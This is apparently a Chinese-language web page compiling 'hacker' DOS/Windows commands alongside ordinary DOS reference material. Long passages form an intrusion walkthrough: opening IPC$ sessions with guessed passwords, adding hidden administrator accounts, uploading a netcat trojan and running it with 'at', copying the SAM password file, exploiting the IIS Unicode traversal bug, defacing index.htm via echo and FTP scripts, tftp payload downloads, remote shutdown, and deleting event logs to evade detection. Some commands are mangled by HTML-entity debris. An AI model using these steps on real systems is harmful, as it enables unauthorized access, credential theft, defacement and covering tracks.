A. 黑客常有的dos命令
黑客常用DOS命令:
net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空鏈接
net use $">\\ip\ipc$Content$nbsp;"密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: $">\\ip\c$Content$nbsp;"密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: $">\\ip\c$Content$nbsp;登陸後映射對方C:到本地為H:
net use $">\\ip\ipc$Content$nbsp;/del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$Content$nbsp;開啟ipc$共享
net share ipc$Content$nbsp;/del 刪除ipc$共享
net share c$Content$nbsp;/del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe $">\\ip\admin$Content$nbsp;復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
$\svv.exe">\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if 在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
print 文件名 列印文本文件
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:
doskey dir= taskmgr 調出任務管理器 chkdsk /F D: 檢查磁碟D並顯示狀態報告;加參數/f並修復磁碟上的錯誤 tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其它任何埠 exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe path 路徑\可執行文件的文件名為可執行文件設置一個路徑。 cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /? regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示; regedit /e 注冊表文件名 導出注冊表 cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問許可權;/G 用戶名:perm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。 cacls 文件名 查看文件的訪問用戶許可權列表 REM 文本內容 在批處理文件中添加註解 netsh 查看或更改本地網路配置情況 IIS服務命令: iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現) iisreset /start或stop 啟動(停止)所有Internet服務 iisreset /restart 停止然後重新啟動所有Internet服務 iisreset /status 顯示所有Internet服務狀態 iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動 iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機 iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務 iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。 FTP 命令: (後面有詳細說明內容) ftp的命令行格式為: ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。 -d 使用調試方式。 -n 限制ftp的自動登錄,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令說明 bye 或 quit 終止主機FTP進程,並退出FTP管理方式. pwd 列出當前遠端主機目錄 put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中 get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中 mget [remote-files] 從遠端主機接收一批文件至本地主機 mput local-files 將本地主機中一批文件傳送至遠端主機 dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件 ascii 設定以ASCII方式傳送文件(預設值) bin 或 image 設定以二進制方式傳送文件 bell 每完成一次文件傳送,報警提示 cp 返回上一級目錄 close 中斷與遠程伺服器的ftp會話(與open對應) open host[port] 建立指定ftp伺服器連接,可指定連接埠 delete 刪除遠端主機中的文件 mdelete [remote-files] 刪除一批文件
B. 誰有DOS命令的解釋哦.
ATTRIB 文件屬性(顯示或改變屬性)
CHDIR(CD) 改變目錄
CHKDSK 檢查磁碟
CHOICE 提示擊鍵輸入
CLS 清屏幕
COMMAND 重新載入MS-DOS程序
COPY 復制文件
DATE 設置顯示日期
DEBUG 調試程序
DEFRAG 清除磁碟碎片
DEL(ERASE) 刪除文件
DELOLDOS 刪除舊DOS文件
DELTREE 刪除目錄樹分支
DIR 顯示目錄
DISKCOMP 比較軟盤內容
DISKCOPY 復制磁碟
DOS 擴展擴充內存管理
DOSSHELL DOS外層
DRIVPARM 定義驅動器參數
EDIT 編輯器
EMM386 內存管理
ERASE 刪除文件
DBLSPACE 磁碟壓縮
EXPAND 釋放壓縮
FASTHELP 快速求助
FC 文件比較
FDISK 磁碟分區
FIND 搜尋指定字串
FOR 循環執行命令
FORMAT 格式化磁碟
MEM 內存使用情況顯示
MKDIR(MD) 建立子目錄
MSAV 檢查和清除病毒
MSBACKUP 磁碟文件務份
PATH 設置搜索路徑
PAUSE 暫停執行命令
RESTORE 磁碟文件轉儲
RENAME(REN) 文件重新命名
RMDIR(RD) 刪除目錄
SCANDISK 檢查磁碟
SYS 傳送系統文件
TIME 設置顯示時間
TREE 顯示目錄結構
TYPE 顯示文件內容
UNDELETE 恢復被刪除文件
VER 顯示系統版本號
VOL 顯示卷標
VSAFE 病毒檢查
XCOPY 復制組文件
APPEND 補充路徑
BREAK 檢查控制中斷
BUFFERS 設置磁碟緩沖區數
CALL 調用批文件
CHCP 轉換碼頁
COUNTRY 確定國家標准貨幣
CTTY 改變控制台
DEVICE 安裝設備驅動程序
DEVICEHIGH 裝載設備驅動程序
ECHO 命令顯示開關
FASTOPEN 快速載入文件
FCBS 使用文件控制塊
FILES 同時打開文件數
GOTO 轉向分支
GRAPHICS 圖形屏幕列印
HELP 求助
IF 設定條件
INCLUDE 簡化多重配置塊
INSTALL 安裝常駐程序
INTERLNK 計算機互連
INTERSVR 與伺服器互連
KEYB 裝載字元轉換表
LABEL 卷標
LASTDRIVE 置最大驅動器數
LOADFIX 裝入固定內存
LOADHIGH(LH) 高內存程序裝載
MEMMAKER 檢查內存
MENUCOLOR 設置顯示選項
MODE 設置硬體工作方式
MSCDEX 訪問CD驅動器
MSO 檢查系統配置
NLSFUNC 支持各國語言
NUMLOCK 控制NUMLOCK鍵
POWER 節省電能
PRINT 後台列印
PROMPT 改變系統提示
QBASIC 啟動QB
REM 注釋信息
REPLACE 替換文件
SET 設置環境變數
SETUP 安裝DOS6。2文件
SETVER 改變DOS版本表
SHARE 網路文件共享
SHELL 裝載命令處理程序
SMARTDRV 磁碟緩沖
SORT 文件排序
STACKS 支持動態使用的數據線
SUBMENU 菜單項(配置CONFIG。SYS)
SUBST 設置虛擬驅動器
SWITCHES 鍵盤開關
VRIFY 磁碟檢驗
》:建立子目錄命令 MD (內部命令)
功能:在指定盤的指定目錄下建立一個子目錄
格式:MD [盤符][路徑]子目錄名
注意:1。不能建立根目錄與目標目錄下已經存在的目錄
2。預設路徑時則表示在當前目錄下建立
2》:改變當前目錄目錄命令: CD (內部命令)
功能:設置指定盤的當前目錄
格式:CD [盤符][路徑]
注意:CD 表示顯示當前目錄
CD..表示退回到根目錄
CD/ 表示退回到上一級目錄
3》:刪除子目錄命令:RD (內部命令)
功能: 從指定的盤符上刪除子目錄
格式: CD [盤符][路徑]子目錄名
注意:1。要刪除的目錄必須為空目錄,如果不為空目錄,先來到該目錄,用 DEL *.*刪除該目錄下的所有內容
再回到上一級目錄,用RD命令刪除該目錄
2。不能刪除當前目錄與根目錄
4》:列文件目錄命令:DIR (內部命令)
功能:顯示指定盤、指定目錄下所包含的文件與下一級子目錄的有關信息
格式:DIR [盤符][路徑][文件名][/P][/W]
[/P]表示分屏顯示
[/W]表示壓縮顯示
5》:顯示全盤目錄命令:TREE (外部命令)
功能:顯示指定盤的目錄結構
格式:[盤符][路徑]TREE [盤符1][/F]
[/F]表示列出各級子目錄的文件名
6》:設置查找目標命令PATH (內部命令)
功能:設置外部文件的查找目錄
格式: PATH [盤符][路徑][;盤符][路徑]……
注意:1。顯示上次PATH命令設置的查找文件目錄命令用:
PATH
2。刪除上次PATH命令設置的文件查找目錄用:
PATH;
7》:刪除目錄命令:DELTREE
功能:將整個目錄及其子目錄和文件全部刪除
格式:DELLTREE [盤符][路徑]目標文件
注意:全部刪除、不論是否系統、隱藏、還是只讀
黑客常用dos命令(轉)
一般黑客入侵所需要的幾個常用命令
1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的操作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
net命令果然強大啊!
2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?
那麼需要用AT命令,這里假設你已經登陸了那個伺服器。
你首先要得到對方的時間,
net time \\127.0.0.1
將會返回一個時間,這里假設時間為12:1,現在需要新建一個作業,其ID=1
at \\127.0.0.1 12:3 nc.exe
這里假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上.
這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,埠為99.
等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬.
3:telnet
這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的埠.
telnet 127.0.0.1 99
這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也就是肉雞.
4:FTP
它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個www.51.NET,不錯的.當我們申請完後,它會給用戶名,密碼,以及FTP伺服器.
在上傳前需要登陸先,這里我們假設FTP伺服器是www.51.NET,用戶名是HUCJS,密碼是654321
ftp www.51.net
他會要求輸入用戶,成功後會要求輸入密碼.
----------------------
下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:\index.htm d:\
5:
下面我說說怎樣把本地的文件復制到對方硬碟上去,需要建立好IPC$連接才有效。
這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下
index.htm \\127.0.0.1\c$\index.htm
----------------------
如果你要復制到D盤下把C改為D,就行了!
index.htm \\127.0.0.1\d$\index.htm
----------------------
如果你要把他復制到WINNT目錄里
就要把輸入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
----------------------
要把對方的文件復制過來,順便告訴大家NT的備份的資料庫放在x:\winnt\repair\sam._ sam._是資料庫的文件名
下面就把127.0.0.1的資料庫復制到本地C盤下
\\127.0.0.1\admin$\repair\sam._ c:\
----------------------
6:set
如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才准有),當然他的80埠要開,不然你黑給誰看。這時需要用SET命令!
下面是我得到的結果!我來分析它,只是找主頁在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=當前登陸者的IP,這里本來是顯示我的IP,被我刪除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉紅色的那行就是對方主頁存放地址,這里告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是主頁的名稱了。
7:nbtstat
如果你掃到一部NT的機子,他的136到139其中一個埠開了的話,就要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破解吧!
現在網上很多NT的機子都開了這些埠的,你可以練習下,我們來分析得到的結果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫哦。
下面是得到的結果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用戶。
這里的用戶是PENTIUMII。
8:Shutdown
關了對方的NT伺服器的命令
Shutdown \\IP地址 t:20
20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。
9:DIR
這個命令沒什麼好講,但是卻非常重要,他是查看一目錄里的所有文件、文件夾。
你可以本地試下。
10:echo
著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。
我們假設我們要把「反獨裁,反一黨制!」寫入index.htm,有2種方法,大家看看有什麼區別。
echo 反獨裁,反一黨制!>index.htm
echo 反獨裁,反一黨制!>>index.htm
第一個的意思是覆蓋index.htm原有的內容,把「反獨裁,反一黨制!」寫進index.htm。
第二個的意思是把「反獨裁,反一黨制!」加到index.htm裡面。
「>>」產生的內容將追加進文件中,「>」則將原文件內容覆蓋。
大家可以本地試下。
可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載主頁到對方的目錄里。
1、首先,我們需要申請一個免費的主頁空間。
2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren伺服器為例。)
open upload.chinaren.com(你的FTP伺服器,申請時你的空間提供商會給你的)
cnhack(你申請時的用戶名)
test(你申請時的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數,執行文件里的內容。)
等命令完成時,文件已經下載到你指定的文件里了。
注意:取得文件後,請刪除cnhack.txt。(如果不刪除,很容易會給別人看到你的密碼。)
記得要 del c:\cnhack.txt
11:attrib
這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件屬性設置了只讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不行。倒!不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的只讀屬性去掉。
如果把「-」改為「+」則是把這個文件的屬性設置為只讀
----------------------
attrib +r index.htm
這個命令是把index.htm的屬性設置為只讀。
12:del
當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日誌,當然要刪除日誌啦!想被捉嗎。呵呵。
NT的日誌有這些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改成其他盤。
黑客常用dos命令2
建立一個空連接
命令:net use \\192.168.0.198\ipc$ "" /user:"administrator"
查看遠程主機的共享資源
命令:net view \\ip
查看遠程主機的當前時間
命令: net time \\ip
得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
命令:nbtstat -A ip
刪除連接:
net use \\127.0.0.1\ipc$ /del
映射/刪除遠程共享:
net use z: \\127.0.0.1\c
向遠程主機復制文件:
路徑\文件名 \\IP\共享目錄名,如:
d:\3389.exe \\IP\c$ 即將d盤下的3389.exe復制到對方c盤內
把遠程主機上的文件復制到自己的機器里:
\\127.0.0.1\c$\xinxin.exe c:\
遠程添加計劃任務:
at \\IP 時間 程序名 如:
at \\IP 11:00 3389.exe
1)查看本地主機的共享資源(可以看到本地的默認共享)
net share
2)得到本地主機的用戶列表
net user
3)顯示本地某用戶的帳戶信息
net user 帳戶名
4)顯示本地主機當前啟動的服務
net start
5)啟動/關閉本地服務
net start 服務名
net stop 服務名
6)在本地添加帳戶
net user 帳戶名 密碼 /add
7)激活禁用的用戶
net uesr 帳戶名 /active:yes
8)加入管理員組
net localgroup administrators xuliguo /add
tftp -i 你的IP get **.exe c:\winnt\system32\**.exe
m溢出的對方SHELL後在DOS下上傳木馬
tftp -i 自已的IP get ***.exe
time
at \\對方的IP 時間 ***.exe
DOS命令大全
一)MD——建立子目錄
1.功能:創建新的子目錄
2.類型:內部命令
3.格式:MD[盤符:][路徑名]〈子目錄名〉
4.使用說明:
(1)「盤符」:指定要建立子目錄的磁碟驅動器字母,若省略,則為當前驅動器;
(2)「路徑名」:要建立的子目錄的上級目錄名,若預設則建在當前目錄下。
例:(1)在C盤的根目錄下創建名為FOX的子目錄;(2)在FOX子目錄下再創建USER子目錄。
C:、>MD FOX (在當前驅動器C盤下創建子目錄FOX)
C:、>MD FOX 、USER (在FOX 子目錄下再創建USER子目錄)
(二)CD——改變當前目錄
1.功能:顯示當前目錄
2.類型:內部命令
3.格式:CD[盤符:][路徑名][子目錄名]
4.使用說明:
(1)如果省略路徑和子目錄名則顯示當前目錄;
(2)如採用「CD、」格式,則退回到根目錄;
(3)如採用「CD.。」格式則退回到上一級目錄。
例:(1)進入到USER子目錄;(2)從USER子目錄退回到子目錄;(3)返回到根目錄。
C:、>CD FOX 、USER(進入FOX子目錄下的USER子目錄)
C:、FOX、USER>CD.。 (退回上一級根目錄)
C:、FOX>CD、 (返回到根目錄)
C:、>
(三)RD——刪除子目錄命令
1.功能:從指定的磁碟刪除了目錄。
2.類型:內部命令
3.格式:RD[盤符:][路徑名][子目錄名]
4.使用說明:
(1)子目錄在刪除前必須是空的,也就是說需要先進入該子目錄,使用DEL(刪除文件的命令)將其子目錄下的文件刪空,然後再退回到上一級目錄,用RD命令刪除該了目錄本身;
(2)不能刪除根目錄和當前目錄。
例:要求把C盤FOX子目錄下的USER子目錄刪除,操作如下:
第一步:先將USER子目錄下的文件刪空;
C、>DEL C:、FOX、USER、*。*
第二步,刪除USER子目錄。
C、>RD C:、FOX、USER
(四)DIR——顯示磁碟目錄命令
1.功能:顯示磁碟目錄的內容。
2.類型:內部命令
3.格式:DIR [盤符][路徑][/P][/W]
4.
使用說明:/P的使用;當欲查看的目錄太多,無法在一屏顯示完屏幕會一直往上卷,不容易看清,加上/P參數後,屏幕上會分面一次顯示23行的文件信息,然後暫停,並提示;Press
any key to continue
/W的使用:加上/W只顯示文件名,至於文件大小及建立的日期和時間則都省略。加上參數後,每行可以顯示五個文件名。
PATH——路徑設置命令
1.功能:設備可執行文件的搜索路徑,只對文件有效。
2.類型:內部命令
3.格式:PATH[盤符1]目錄[路徑名1]{[;盤符2:],〈目錄路徑名2〉…}
4.使用說明:
(1)當運行一個可執行文件時,DOS會先在當前目錄中搜索該文件,若找到則運行之;若找不到該文件,則根據PATH命令所設置的路徑,順序逐條地到目錄中搜索該文件;
(2)PATH命令中的路徑,若有兩條以上,各路徑之間以一個分號「;」隔開;
(3)PATH命令有三種使用方法:
PATH[盤符1:][路徑1][盤符2:][路徑2]…(設定可執行文件的搜索路徑) PATH:(取消所有路徑)
PATH:(顯示目前所設的路徑)
(六)TREE——顯示磁碟目錄結構命令
1.功能:顯示指定驅動器上所有目錄路徑和這些目錄下的所有文件名。
2.類型:外部命令
3.格式:TREE[盤符:][/F][》PRN]
4.使用說明:
(1)使用/F參數時顯示所有目錄及目錄下的所有文件,省略時,只顯示目錄,不顯示目錄下的文件;
(2)選用>PRN參數時,則把所列目錄及目錄中的文件名列印輸出。
(七)DELTREE——刪除整個目錄命令
1.功能:將整個目錄及其下屬子目錄和文件刪除。
2.類型:外部命令
3.格式:DELTREE[盤符:]〈路徑名〉
4.使用說明:該命令可以一步就將目錄及其下的所有文件、子目錄、更下層的子目錄一並刪除,而且不管文件的屬性為隱藏、系統或只讀,只要該文件位於刪除的目錄之下,DELTREE都一視同仁,照刪不誤。使用時務必小心!!!
五、磁碟操作類命令
(一)formAT——磁碟格式化命令
1.功能:對磁碟進行格式化,劃分磁軌和扇區;同時檢查出整個磁碟上有無帶缺陷的磁軌,對壞道加註標記;建立目錄區和文件分配表,使磁碟作好接收DOS的准備。
2.類型:外部命令
3.格式:formAT〈盤符:〉[/S][/4][/Q]
4.使用說明:
(1)命令後的盤符不可預設,若對硬碟進行格式化,則會如下列提示:WARNING:ALL DATA ON NON
——REMOVABLE DISK
DRIVE C:WILL BE LOST !
Proceed with format (Y/N)?
